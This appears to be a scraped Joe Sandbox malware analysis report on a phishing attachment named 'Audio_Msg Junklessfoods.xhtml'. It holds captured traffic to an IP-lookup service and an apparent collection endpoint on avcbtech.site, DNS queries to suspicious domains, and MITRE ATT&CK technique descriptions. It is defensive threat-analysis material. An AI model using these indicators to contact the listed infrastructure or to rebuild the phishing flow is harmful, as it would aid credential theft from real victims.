Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: office.avcbtech.store
Source: global traffic	DNS traffic detected: DNS query: sender.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: i.imgur.com
Source: global traffic	DNS traffic detected: DNS query: server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: _8248._https.server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: avcbtech.site

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Static File Info

General

Static OLE Info

General

OLE File "#Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml"

Indicators

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

Windows Analysis Report
#Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml